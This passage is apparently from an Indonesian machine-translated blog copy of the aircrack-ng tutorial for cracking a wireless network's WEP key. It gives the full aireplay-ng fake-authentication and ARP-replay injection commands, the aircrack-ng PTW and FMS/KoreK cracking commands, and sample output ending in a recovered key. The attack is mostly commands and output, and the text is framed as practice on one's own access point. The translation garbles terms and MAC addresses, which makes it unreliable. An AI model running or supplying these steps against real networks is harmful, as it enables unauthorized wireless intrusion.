  • -O 1 - Kirim hanya satu set paket pada suatu waktu. Default adalah beberapa dan ini membingungkan beberapa AP.
  • -Q 10 - Mengirim paket tetap hidup setiap 10 detik.
Sukses terlihat seperti:
18:22:32 Mengirim Permintaan 18:22:32 Otentikasi Authentication sukses 18:22:32 Mengirim Permintaan 18:22:32 Asosiasi Asosiasi sukses :-) 18:22:42 Mengirim tetap-hidup paket 18:22:52 Mengirim tetap -hidup paket # dan seterusnya.
Berikut adalah contoh dari apa otentikasi gagal terlihat seperti:
08:28:02 Otentikasi Permintaan Mengirim 18:28:02 Otentikasi 18:28:02 sukses Mengirim Permintaan 18:28:02 Asosiasi Asosiasi sukses :-) 18:28:02 Punya paket deauthentication! 18:28:05 Mengirim Permintaan 18:28:05 Otentikasi Authentication sukses 18:28:05 Mengirim Permintaan Asosiasi 18:28:10 Mengirim Permintaan Otentikasi Authentication 18:28:10 sukses 18:28:10 Mengirim Permintaan Asosiasi
Perhatikan "Punya paket deauthentication" dan retries terus menerus di atas.Jangan lanjutkan ke langkah berikutnya sampai Anda memiliki otentikasi yang palsu berjalan dengan benar.
Tips Pemecahan Masalah
  • Beberapa jalur akses yang dikonfigurasi untuk hanya memperbolehkan alamat MAC dipilih untuk mengasosiasikan dan menghubungkan. Jika hal ini terjadi, Anda tidak akan dapat berhasil melakukan otentikasi palsu kecuali jika Anda tahu salah satu alamat MAC pada daftar yang diperbolehkan. Jika Anda menduga ini adalah masalah, gunakan perintah berikut ketika mencoba untuk melakukan otentikasi palsu. Mulai sesi lain dan ...
Jalankan: tcpdump-n-vvv-s0-e-i
Anda kemudian akan mencari pesan kesalahan.
  • Jika suatu saat Anda ingin mengonfirmasi Anda benar terkait adalah dengan menggunakan tcpdump dan melihat paket. Mulai sesi lain dan ...
Jalankan: "tcpdump-n-e-s0-vvv-i ath0"
Berikut ini adalah tcpdump khas pesan galat yang Anda cari:
 11:04:34.360700 314us BSSID: 00:14:06 c: 7e: 40:80 DA: F 00:00: B5: 88: AC: 82 SA: 00:14:06 c: 7e: deauthentication 40:80: Kelas 3 bingkai diterima dari stasiun nonassociated
Perhatikan bahwa titik akses (00:14:06 c: 7e: 40:80) memberitahu sumber (0:00 F: B5: 88: AC: 82) Anda tidak terkait. Artinya, AP tidak akan memproses atau menerima paket disuntikkan.
Jika Anda ingin memilih hanya paket deauth dengan tcpdump maka Anda dapat menggunakan: "tcpdump-n-e-s0-vvv-i ath0 | grep-i deauth". Anda mungkin perlu tweak frase "deauth" untuk memilih paket yang tepat yang Anda inginkan.
Langkah 5 - Mulai aireplay-ng dalam modus memutar ulang permintaan ARP
Tujuan dari langkah ini adalah mulai aireplay-ng dalam mode yang mendengarkan permintaan ARP kemudian reinjects mereka kembali ke jaringan.Untuk penjelasan ARP, lihat halaman PC Magazine atau Wikipedia . Alasan kita memilih paket ARP permintaan karena AP biasanya akan rebroadcast mereka dan menghasilkan IV baru. Sekali lagi, ini adalah tujuan kami, untuk mendapatkan sejumlah besar infus dalam waktu singkat.
Buka konsol sesi lain dan masukkan:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Ini akan mulai mendengarkan permintaan ARP dan ketika mendengar satu, aireplay-ng akan segera mulai menyuntikkan. Pada jaringan rumah Anda, di sini adalah cara mudah untuk menghasilkan sebuah permintaan ARP: Pada PC kabel, ping IP tidak ada di LAN rumah Anda.
Berikut adalah apa layar tampak seperti ketika ARP permintaan sedang disuntikkan:
Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Anda dapat mengkonfirmasi bahwa Anda suntik dengan memeriksa airodump-ng layar Anda. Paket data harus meningkat pesat. The "# / s" harus angka yang layak. Namun, yang layak tergantung pada berbagai faktor besar. Sebuah jarak umumnya adalah 300 sampai 400 paket data per detik. Hal ini dapat serendah 100/second dan setinggi 500/second satu.
Tips Pemecahan Masalah
  • Jika Anda menerima pesan yang mirip dengan "Punya paket deauth / disassoc. Apakah sumber terkait mac? ", Ini berarti Anda telah kehilangan hubungan dengan AP. Semua paket Anda disuntikkan akan diabaikan. Anda harus kembali ke langkah otentikasi palsu (Langkah 3) dan berhasil asosiasi dengan AP.
Langkah 6 - Jalankan aircrack-ng untuk mendapatkan kunci WEP
Tujuan dari langkah ini adalah untuk mendapatkan WEP kunci dari IV berkumpul di langkah sebelumnya.
Catatan: Untuk tujuan belajar, Anda harus menggunakan 64 bit WEP kunci pada AP Anda untuk mempercepat proses cracking. Jika hal ini terjadi, maka Anda dapat menyertakan "-n 64" untuk membatasi pemeriksaan kunci 64 bit.
Dua metode akan ditampilkan. Disarankan Anda mencoba baik untuk tujuan belajar. Dengan mencoba kedua metode, Anda akan melihat dengan cepat metode PTW berhasil menentukan WEP kunci dibandingkan dengan metode FMS / Korek. Sebagai pengingat, metode PTW hanya bekerja dengan sukses dengan arp permintaan / jawaban paket. Karena tutorial ini mencakup injeksi paket ARP request, Anda benar dapat menggunakan metode ini. Persyaratan lainnya adalah bahwa Anda menangkap paket penuh dengan airodump-ng. Artinya, tidak menggunakan "- ivs" pilihan.
Mulai sesi lain konsol dan masukkan:
aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
Dimana:
  • -Z memanggil PTW WEP metode-retak.
  • -B 00:14:06 C: 7E: 40:80 memilih satu titik akses kita tertarik ini opsional . Karena ketika kita awalnya menangkap data, kita menerapkan filter untuk hanya menangkap data untuk satu AP.
  • Output topi *. memilih semua file yang dimulai dengan "output" dan berakhir di ". topi".
Untuk juga menggunakan metode FMS / Korek, mulai lagi sesi konsol dan masukkan:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
Dimana:
  • -B 00:14:06 C: 7E: 40:80 memilih satu titik akses kita tertarik ini opsional . Karena ketika kita awalnya menangkap data, kita menerapkan filter untuk hanya menangkap data untuk satu AP.
  • Output topi *. memilih semua file yang dimulai dengan "output" dan berakhir di ". topi".
Jika Anda menggunakan 1.0 RC1-, menambahkan opsi "-K" untuk serangan FMS / Korek. (1.0-RC1 default untuk PTW.)
Anda dapat menjalankan ini sementara menghasilkan paket. Dalam waktu singkat, WEP kunci akan dihitung dan disajikan. Anda akan membutuhkan sekitar 250.000 infus untuk 64 bit dan 1.500.000 infus untuk 128 bit kunci. Jika Anda menggunakan serangan PTW, maka Anda akan membutuhkan sekitar 20.000 paket untuk 64-bit dan 40.000 sampai 85.000 paket untuk 128 bit. Ini sangat perkiraan dan ada banyak variabel untuk berapa banyak infus yang sebenarnya Anda butuhkan untuk memecahkan Kunci WEP.
Berikut adalah apa sukses terlihat seperti:
                                              Aircrack-ng 0,9
KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%
Perhatikan bahwa dalam kasus ini dibutuhkan jauh lebih sedikit maka diperkirakan 250.000 infus untuk memecahkan kuncinya. (Untuk contoh ini, serangan FMS / Korek digunakan.)
 
./BoeimCyber © 2011 Templates | Boeim